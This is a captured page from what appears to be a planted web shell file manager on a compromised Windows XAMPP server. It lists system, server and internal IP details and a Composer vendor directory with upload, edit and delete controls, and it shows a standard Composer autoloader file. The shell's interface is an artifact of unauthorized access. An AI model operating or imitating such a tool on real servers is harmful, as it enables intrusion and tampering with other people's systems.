[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
alajaji
/
libraries
/
vendor
/
composer
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 InstalledVersions.php
13,927 B
SET
[ EDIT ]
|
[ DEL ]
📄 LICENSE
1,070 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_namespaces.php
293 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_real.php
2,549 B
SET
[ EDIT ]
|
[ DEL ]
📄 autoload_static.php
31,525 B
SET
[ EDIT ]
|
[ DEL ]
📄 installed.json
79,849 B
SET
[ EDIT ]
|
[ DEL ]
📄 installed.php
13,769 B
SET
[ EDIT ]
|
[ DEL ]
📄 platform_check.php
926 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: autoload_real.php
<?php // autoload_real.php @generated by Composer class ComposerAutoloaderInitc14bde14f8c86840049f5c1809c453dd { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } /** * @return \Composer\Autoload\ClassLoader */ public static function getLoader() { if (null !== self::$loader) { return self::$loader; } require __DIR__ . '/platform_check.php'; spl_autoload_register(array('ComposerAutoloaderInitc14bde14f8c86840049f5c1809c453dd', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(\dirname(__FILE__))); spl_autoload_unregister(array('ComposerAutoloaderInitc14bde14f8c86840049f5c1809c453dd', 'loadClassLoader')); $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded()); if ($useStaticLoader) { require __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInitc14bde14f8c86840049f5c1809c453dd::getInitializer($loader)); } else { $map = require __DIR__ . '/autoload_namespaces.php'; foreach ($map as $namespace => $path) { $loader->set($namespace, $path); } $map = require __DIR__ . '/autoload_psr4.php'; foreach ($map as $namespace => $path) { $loader->setPsr4($namespace, $path); } $classMap = require __DIR__ . '/autoload_classmap.php'; if ($classMap) { $loader->addClassMap($classMap); } } $loader->register(true); if ($useStaticLoader) { $includeFiles = Composer\Autoload\ComposerStaticInitc14bde14f8c86840049f5c1809c453dd::$files; } else { $includeFiles = require __DIR__ . '/autoload_files.php'; } foreach ($includeFiles as $fileIdentifier => $file) { composerRequirec14bde14f8c86840049f5c1809c453dd($fileIdentifier, $file); } return $loader; } } function composerRequirec14bde14f8c86840049f5c1809c453dd($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { require $file; $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; } }